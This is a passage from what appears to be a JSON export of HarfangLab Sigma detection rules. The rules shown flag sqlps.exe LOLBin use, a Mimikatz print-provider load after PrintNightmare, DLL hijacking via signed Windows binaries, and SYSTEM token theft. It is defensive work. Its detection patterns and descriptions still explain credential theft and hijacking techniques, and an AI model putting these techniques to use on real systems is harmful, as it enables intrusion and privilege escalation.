HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1127\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Sqlps\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # Microsoft SQL Server 100 and 110 are PowerShell v2\n # Microsoft SQL Server 120 and 130 are PowerShell v4\n OriginalFileName: 'SQLPS.exe'\n exclusion_legitimate_parent:\n ParentCommandLine|contains:\n - '\\MSSQL\\Binn\\SQLAGENT.EXE -i '\n - '\\Tools\\Binn\\ManagementStudio\\Ssms.exe'\n - '\\Tools\\Binn\\SQLPS.exe agentjob'\n\n exclusion_interactive_shell:\n ProcessParentImage|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\pwsh.exe'\n ProcessGrandparentImage|endswith: '\\explorer.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1677f32b-ab7c-4b86-a079-48c3166975e0", "rule_name": "Suspicious sqlps.exe Execution", "rule_description": "Detects the suspicious execution of the legitimate sqlps.exe Windows binary, a PowerShell wrapper for running SQL-built cmdlets which is a utility included with Microsoft SQL Server.\nAttackers can use this utility as a LOLBin to bypass security restrictions.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of sqlps.exe and to analyze child processes.\n", "rule_creation_date": "2022-06-07", "rule_modified_date": "2025-01-30", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.execution" ], "rule_technique_tags": [ "attack.t1059.001", "attack.t1127" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "1693e403-2800-4cd4-b918-144cf1d96336", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.609367Z", "creation_date": "2026-03-23T11:45:34.609370Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.609377Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", "https://attack.mitre.org/techniques/T1055/" ], "name": "t1574_spoolsv_mimikatz_provider_load.yml", "content": "title: Spoolsv Mimikatz Signed Print Provider Loaded\nid: 1693e403-2800-4cd4-b918-144cf1d96336\ndescription: |\n Detects spoolsv loading the mimikatz signed print provider.\n This is a sign of a CVE-2021-1675 post exploitation.\n It is recommended to isolate the affected assets and to look for attacker activities on other hosts.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\n - https://attack.mitre.org/techniques/T1055/\ndate: 2021/07/06\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1055\n - attack.s0002\n - cve.2021-1675\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Exploit.PrintNightmare\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\spoolsv.exe'\n Signed: 'true'\n Signature|contains: 'Open Source Developer, Benjamin Delpy'\n ImageLoaded: '?:\\Windows\\System32\\spool\\drivers\\\\*\\\\?\\\\*'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "1693e403-2800-4cd4-b918-144cf1d96336", "rule_name": "Spoolsv Mimikatz Signed Print Provider Loaded", "rule_description": "Detects spoolsv loading the mimikatz signed print provider.\nThis is a sign of a CVE-2021-1675 post exploitation.\nIt is recommended to isolate the affected assets and to look for attacker activities on other hosts.\n", "rule_creation_date": "2021-07-06", "rule_modified_date": "2025-04-08", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1055" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "16a70c78-b3ad-445a-bef6-ca597bfdb2b3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.080546Z", "creation_date": "2026-03-23T11:45:34.080548Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.080552Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_sppsvc.yml", "content": "title: DLL Hijacking via sppsvc.exe\nid: 16a70c78-b3ad-445a-bef6-ca597bfdb2b3\ndescription: |\n Detects potential Windows DLL Hijacking via sppsvc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sppsvc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTXML.dll'\n - '\\pkeyhelper.dll'\n - '\\webservices.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "16a70c78-b3ad-445a-bef6-ca597bfdb2b3", "rule_name": "DLL Hijacking via sppsvc.exe", "rule_description": "Detects potential Windows DLL Hijacking via sppsvc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "16ac2b82-bf41-4651-832f-0b67481cbba0", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.596042Z", "creation_date": "2026-03-23T11:45:34.596046Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.596053Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/incognito/incognito.c", "https://attack.mitre.org/techniques/T1134/" ], "name": "t1034_possible_system_access_token_theft.yml", "content": "title: Possible SYSTEM Access Token Theft\nid: 16ac2b82-bf41-4651-832f-0b67481cbba0\ndescription: |\n Detects the suspicious creation of a process with SYSTEM privileges by a High Integrity process.\n This can be indicative of token theft from a SYSTEM process in order to locally elevate privileges.\n It is recommended to analyze the behavior and content of both the parent and the child process to search for malicious actions.\nreferences:\n - https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/incognito/incognito.c\n - https://attack.mitre.org/techniques/T1134/\ndate: 2023/06/20\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1134.001\n - attack.t1134.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n IntegrityLevel: 'System'\n ParentIntegrityLevel: 'High'\n\n exclusion_teamviewer:\n - ParentImage|endswith:\n - '?:\\ProgramData\\GenapiTV\\TeamViewer.exe'\n - '\\TeamViewer\\TeamViewer.exe'\n - '\\TeamViewerPortable\\TeamViewer.exe'\n - '\\AppData\\Local\\TeamViewer\\CustomConfigs\\\\*\\TeamViewer.exe'\n - '\\AppData\\Roaming\\TeamViewerMeeting\\TeamViewerMeeting.exe'\n - '\\AppData\\Local\\Temp\\TeamViewer\\Version?\\TeamViewer.exe'\n - '\\AppData\\Local\\Temp\\\\*\\TeamViewer\\Version?\\TeamViewer.exe'\n - ProcessParentOriginalFileName: 'TeamViewer.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature:\n - 'TeamViewer Germany GmbH'\n - 'TeamViewer GmbH'\n\n exclusion_mssql:\n ParentImage|endswith: '\\MSSQL\\Binn\\sqlservr.exe'\n\n exclusion_anydesk:\n - ParentImage|endswith:\n - '\\AnyDesk.exe'\n - '\\AnyDesk????.exe'\n - '\\AnyDesk_????.exe'\n - ProcessParentDescription: 'AnyDesk'\n ProcessParentSigned: 'true'\n ProcessParentSignature:\n - 'AnyDesk Software GmbH'\n - 'philandro Software GmbH'\n\n exclusion_werfault:\n Image: '?:\\Windows\\System32\\WerFault.exe'\n\n exclusion_advanced_run:\n ParentImage|endswith: '\\AdvancedRun.exe'\n\n exclusion_prohelp:\n ParentImage:\n - '?:\\Program Files\\Mattec\\ProHelp\\bin\\moller.exe'\n - '?:\\Program Files (x86)\\Mattec\\ProHelp\\bin\\moller.exe'\n\n exclusion_etdctrl:\n ParentImage: '?:\\windows\\system32\\ETDCtrl.exe'\n\n exclusion_rg_systemes_assist:\n OriginalFileName:\n - 'RG_Supervision.exe'\n - 'Assist.exe'\n Signed: 'true'\n Signature: 'RG Systèmes SAS'\n\n exclusion_conhost:\n Image: '?:\\Windows\\System32\\conhost.exe'\n\n exclusion_vmmem:\n ParentImage:\n - 'vmmem'\n - 'vmmemWSL'\n\n exclusion_taskkill:\n # taskkill /IM msedge.exe /F\n # taskkill /IM TDMon.exe\n CommandLine|startswith: 'taskkill /IM '\n ParentCommandLine|startswith: '?:\\Windows\\SysWOW64\\inetsrv\\w3wp.exe -ap DefaultAppPool -v '\n GrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k iissvcs'\n\n exclusion_ninite:\n CommandLine|contains: '\\AppData\\Local\\Temp\\\\????????-????-????-????-????????????\\Ninite.exe /runsetup ????????-????-????-????-????????????'\n ParentImage|endswith: '\\Ninite.exe'\n\n exclusion_dell_remote_assist:\n OriginalFileName: 'DellRemoteAssist.exe'\n Signed: 'true'\n ProcessParentOriginalFileName: 'DellRemoteAssist.exe'\n ProcessParentSigned: 'true'\n CommandLine|contains:\n - 'startup=runSystem'\n - 'startup=runElevated'\n - 'startup=systemBaseClient'\n\n exclusion_securityhealthsetup:\n ProcessImage: '?:\\Windows\\SoftwareDistribution\\Download\\Install\\securityhealthsetup.exe'\n Signed: 'true'\n\n exclusion_rustdeck1:\n OriginalFileName: 'rustdesk.exe'\n CommandLine|contains: ' --run-as-system'\n\n exclusion_rustdeck2:\n OriginalFileName: 'rustdesk.exe'\n Signed: 'true'\n Signature: 'Zhou Huabing'\n\n # https://www.navista.fr/support-technique/\n exclusion_navista:\n OriginalFileName: 'rustdesk.exe'\n Signed: 'true'\n Signature: 'PURSLANE'\n\n exclusion_ansible:\n CommandLine: 'powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand CgAgACAAIAAgACYAYwBoAGMAcAAuAGMAbwBtACAANgA1ADAAMAAxACAAPgAgACQAbgB1AGwAbAAKACAAIAAgACAAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQAKACAAIAAgACAAJABzAHAAbABpAHQAXwBwAGEAcgB0AHMAIAA9ACAAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByAC4AUwBwAGwAaQB0ACgAQAAoACIAYAAwAGAAMABgADAAYAAwACIAKQAsACAAMgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBSAGUAbQBvAHYAZQBFAG0AcAB0AHkARQBuAHQAcgBpAGUAcwApAAoAIAAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAGoAcwBvAG4AXwByAGEAdwAgAC0AVgBhAGwAdQBlACAAJABzAHAAbABpAHQAXwBwAGEAcgB0AHMAWwAxAF0ACgAgACAAIAAgACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAIAAgACAAIAAmACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIACgA='\n\n exclusion_paragon:\n ProcessImage: '?:\\Program Files\\Paragon Software\\Paragon Backup and Recovery\\program\\hdmengine_scriptsapp.exe'\n Signed: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "16ac2b82-bf41-4651-832f-0b67481cbba0", "rule_name": "Possible SYSTEM Access Token Theft", "rule_description": "Detects the suspicious creation of a process with SYSTEM privileges by a High Integrity process.\nThis can be indicative of token theft from a SYSTEM process in order to locally elevate privileges.\nIt is recommended to analyze the behavior and content of both the parent and the child process to search for malicious actions.\n", "rule_creation_date": "2023-06-20", "rule_modified_date": "2025-04-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1134.001", "attack.t1134.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "16bd5dca-1018-431d-b375-f0bec118e825", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.077520Z", "creation_date": "2026-03-23T11:45:34.077522Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.077527Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_appvshnotify.yml", "content": "title: DLL Hijacking via AppVShNotify.exe\nid: 16bd5dca-1018-431d-b375-f0bec118e825\ndescription: |\n Detects potential Windows DLL Hijacking via AppVShNotify.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'AppVShNotify.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\userenv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "16bd5dca-1018-431d-b375-f0bec118e825", "rule_name": "DLL Hijacking via AppVShNotify.exe", "rule_description": "Detects potential Windows DLL Hijacking via AppVShNotify.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "16c5e5af-a716-4159-bbc4-d614187f5564", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.590369Z", "creation_date": "2026-03-23T11:45:34.590373Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.590383Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_dpiscaling.yml", "content": "title: DLL Hijacking via dpiscaling.exe\nid: 16c5e5af-a716-4159-bbc4-d614187f5564\ndescription: |\n Detects potential Windows DLL Hijacking via dpiscaling.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dpiscaling.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\iphlpapi.dll'\n - '\\ndfapi.dll'\n - '\\PROPSYS.dll'\n - '\\shell32.dll'\n - '\\wdi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "16c5e5af-a716-4159-bbc4-d614187f5564", "rule_name": "DLL Hijacking via dpiscaling.exe", "rule_description": "Detects potential Windows DLL Hijacking via dpiscaling.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "16d32dde-ef35-4e0e-91a8-466d49409ba8", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.075187Z", "creation_date": "2026-03-23T11:45:34.075189Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.075194Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://wietze.github.io/blog/save-the-environment-variables", "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_wlbs.yml", "content": "title: DLL Hijacking via WLBS.exe\nid: 16d32dde-ef35-4e0e-91a8-466d49409ba8\ndescription: |\n Detects potential Windows DLL Hijacking via WLBS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WLBS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "16d32dde-ef35-4e0e-91a8-466d49409ba8", "rule_name": "DLL Hijacking via WLBS.exe", "rule_description": "Detects potential Windows DLL Hijacking via WLBS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "16e0ffc8-8668-4969-8fe3-840080ccc099", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.587639Z", "creation_date": "2026-03-23T11:45:34.587643Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.587650Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/xforcered/WFH", "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://wietze.github.io/blog/save-the-environment-variables", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_bootcfg.yml", "content": "title: DLL Hijacking via bootcfg.exe\nid: 16e0ffc8-8668-4969-8fe3-840080ccc099\ndescription: |\n Detects potential Windows DLL Hijacking via bootcfg.exe.\n DLL hijacking takes advantage of the default 